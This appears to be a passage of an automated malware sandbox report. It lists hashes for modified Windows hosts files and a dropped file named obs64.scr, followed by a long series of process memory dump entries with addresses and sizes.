64f473084623479ea7b7329cb37a26d30a64be0b6395e469b10ff187d489882b21570ac1f9200f17535ef2ba632549cd9bf6b8f1c848373c549a1b58fabf1615

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
1KB

MD5
872e498bf571eda19f2394020ace3eaa

SHA1
a7a0e41ccdebd26c6a59b19464b2f31a005ebb8d

SHA256
9e904c48e66473f9f86765ad04d8f8d1a07340083e41fe4ce1d011df6ef06850

SHA512
33335e256c33718bc1edb339956fe495dc8ef997906092c3b344902eaa13ed4c87062a58c7f3f5f89a70edcbbb563581124dc5441c1c19f0208bec9b3150b715

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
1KB

MD5
f0b9e5d0f4303314ad1cdc1d6aadac2d

SHA1
cbdadc878feb9f302cc70e72e9d31f6791ca33fe

SHA256
fdd521b3aa3d680d26c65ed67ac5cc1943e5861b61741653671243460119c4f3

SHA512
840419f6112e37baf1b337507e2f646cdf6c20f5242292f8a541652c3b414354f36e3e67eae4be084e5eec626a28757736a439dcc3ea3ae707454a7737df0518

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
1KB

MD5
960502a0ae88ef892ead60dc6b2fb6a9

SHA1
df7869a276b705db6675ba1976b4f392eb2f2e49

SHA256
af6f265dbb05a8cb23d580442732df055eb9cd7156567040a90b01710485e4f6

SHA512
470260588909a5da5590b5a278fc6d545a0535f72da81271d27106af13ceaef7713eea8eb0c9ad0d2cd542938acc6cf532977ff216c12424aa5d048de361264f

Download Submit
C:\tmp\obs64.scr
Filesize
10.6MB

MD5
aefbd2962b02bfbc4329b113a7becf71

SHA1
72393d8da155bbdc14b78272c3385e160baaec74

SHA256
40ff9401bb6030edf891f86b85fc2cd23882229c1331292a8d8986de163331e4

SHA512
503b0c31ccfe2953e74cad0dda6fc91369f210e853d6d3aea4dc8859cfac2740c3bd1436ced18a6149ccdde547c35fba3cba200eb4bada1a55d3abbb907a6a0f

Download Submit
C:\tmp\obs64.scr
Filesize
10.6MB

MD5
aefbd2962b02bfbc4329b113a7becf71

SHA1
72393d8da155bbdc14b78272c3385e160baaec74

SHA256
40ff9401bb6030edf891f86b85fc2cd23882229c1331292a8d8986de163331e4

SHA512
503b0c31ccfe2953e74cad0dda6fc91369f210e853d6d3aea4dc8859cfac2740c3bd1436ced18a6149ccdde547c35fba3cba200eb4bada1a55d3abbb907a6a0f

Download Submit
C:\tmp\obs64.scr
Filesize
10.6MB

MD5
aefbd2962b02bfbc4329b113a7becf71

SHA1
72393d8da155bbdc14b78272c3385e160baaec74

SHA256
40ff9401bb6030edf891f86b85fc2cd23882229c1331292a8d8986de163331e4

SHA512
503b0c31ccfe2953e74cad0dda6fc91369f210e853d6d3aea4dc8859cfac2740c3bd1436ced18a6149ccdde547c35fba3cba200eb4bada1a55d3abbb907a6a0f

Download Submit
memory/316-200-0x0000000000000000-mapping.dmp

Download
memory/484-140-0x0000000000000000-mapping.dmp

Download
memory/488-134-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/488-132-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/488-146-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/768-174-0x0000000000000000-mapping.dmp

Download
memory/1104-182-0x0000000000000000-mapping.dmp

Download
memory/1116-151-0x0000000000000000-mapping.dmp

Download
memory/1144-159-0x0000000000000000-mapping.dmp

Download
memory/1316-163-0x0000000000000000-mapping.dmp

Download
memory/1460-167-0x0000000000000000-mapping.dmp

Download
memory/1676-166-0x0000000000000000-mapping.dmp

Download
memory/1684-208-0x0000000000000000-mapping.dmp

Download
memory/1736-227-0x0000000000000000-mapping.dmp

Download
memory/1792-173-0x0000000000000000-mapping.dmp

Download
memory/1800-216-0x0000000000000000-mapping.dmp

Download
memory/1844-220-0x0000000000000000-mapping.dmp

Download
memory/1932-202-0x0000000000000000-mapping.dmp

Download
memory/1956-156-0x0000000000000000-mapping.dmp

Download
memory/1964-135-0x0000000000000000-mapping.dmp

Download
memory/2144-162-0x0000000000000000-mapping.dmp

Download
memory/2172-194-0x0000000000000000-mapping.dmp

Download
memory/2180-184-0x0000000000000000-mapping.dmp

Download
memory/2272-154-0x0000000000000000-mapping.dmp

Download
memory/2288-204-0x0000000000000000-mapping.dmp

Download
memory/2356-210-0x0000000000000000-mapping.dmp

Download
memory/2412-178-0x0000000000000000-mapping.dmp

Download
memory/2416-225-0x0000000000000000-mapping.dmp

Download
memory/2504-150-0x0000000000000000-mapping.dmp

Download
memory/2640-160-0x0000000000000000-mapping.dmp

Download
memory/2704-206-0x0000000000000000-mapping.dmp

Download
memory/2708-148-0x0000000000000000-mapping.dmp

Download
memory/2824-172-0x0000000000000000-mapping.dmp

Download
memory/2828-222-0x0000000000000000-mapping.dmp

Download
memory/2996-181-0x0000000000000000-mapping.dmp

Download
memory/3236-252-0x0000000000400000-0x0000000000D7A000-memory.dmp

Filesize
9.5MB

Download
memory/3236-253-0x0000000000400000-0x0000000000D7A000-memory.dmp

Filesize
9.5MB

Download
memory/3236-245-0x0000000000400000-0x0000000000D7A000-memory.dmp

Filesize
9.5MB

Download
memory/3236-248-0x0000000000400000-0x0000000000D7A000-memory.dmp

Filesize
9.5MB

Download
memory/3236-259-0x0000000000400000-0x0000000000D7A000-memory.dmp

Filesize
9.5MB

Download
memory/3236-251-0x0000000000400000-0x0000000000D7A000-memory.dmp

Filesize
9.5MB

Download
memory/3264-185-0x0000000000000000-mapping.dmp

Download
memory/3272-212-0x0000000000000000-mapping.dmp

Download
memory/3304-143-0x0000000000000000-mapping.dmp

Download
memory/3308-138-0x0000000000000000-mapping.dmp

Download
memory/3328-171-0x0000000000000000-mapping.dmp

Download
memory/3500-260-0x0000000011000000-0x0000000011158000-memory.dmp

Filesize
1.3MB

Download
memory/3500-263-0x00000000033E0000-0x0000000003487000-memory.dmp

Filesize
668KB

Download
memory/3500-256-0x0000000000400000-0x0000000000854000-memory.dmp

Filesize
4.3MB

Download
memory/3500-264-0x0000000000400000-0x0000000000854000-memory.dmp

Filesize
4.3MB

Download
memory/3500-254-0x0000000000400000-0x0000000000854000-memory.dmp

Filesize
4.3MB

Download
memory/3500-261-0x00000000033E0000-0x0000000003487000-memory.dmp

Filesize
668KB

Download
memory/3500-262-0x0000000011000000-0x0000000011158000-memory.dmp

Filesize
1.3MB

Download
memory/3500-258-0x0000000000400000-0x0000000000854000-memory.dmp

Filesize
4.3MB

Download
memory/3500-257-0x0000000000400000-0x0000000000854000-memory.dmp

Filesize
4.3MB

Download
memory/3504-218-0x0000000000000000-mapping.dmp

Download
memory/3608-155-0x0000000000000000-mapping.dmp

Download
memory/3620-169-0x0000000000000000-mapping.dmp

Download
memory/3808-168-0x0000000000000000-mapping.dmp

Download
memory/3812-161-0x0000000000000000-mapping.dmp

Download
memory/3824-224-0x0000000000000000-mapping.dmp

Download
memory/3988-170-0x0000000000000000-mapping.dmp

Download
memory/4048-196-0x0000000000000000-mapping.dmp

Download
memory/4168-158-0x0000000000000000-mapping.dmp

Download
memory/4184-198-0x0000000000000000-mapping.dmp

Download
memory/4216-179-0x0000000000000000-mapping.dmp

Download
memory/4236-180-0x0000000000000000-mapping.dmp

Download
memory/4304-164-0x0000000000000000-mapping.dmp

Download
memory/4480-176-0x0000000000000000-mapping.dmp

Download
memory/4532-229-0x0000000000000000-mapping.dmp

Download
memory/4544-190-0x0000000000000000-mapping.dmp

Download
memory/4576-141-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/4576-247-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/4576-139-0x0000000000000000-mapping.dmp

Download
memory/4576-147-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/4700-187-0x0000000000000000-mapping.dmp

Download
memory/4764-153-0x0000000000000000-mapping.dmp

Download
memory/4788-188-0x0000000000000000-mapping.dmp

Download
memory/4796-177-0x0000000000000000-mapping.dmp

Download
memory/4816-157-0x0000000000000000-mapping.dmp

Download
memory/4828-175-0x0000000000000000-mapping.dmp

Download
memory/4956-165-0x0000000000000000-mapping.dmp

Download
memory/5052-152-0x0000000000000000-mapping.dmp

Download
memory/5060-214-0x0000000000000000-mapping.dmp

Download
memory/5104-193-0x0000000000000000-mapping.dmp

Download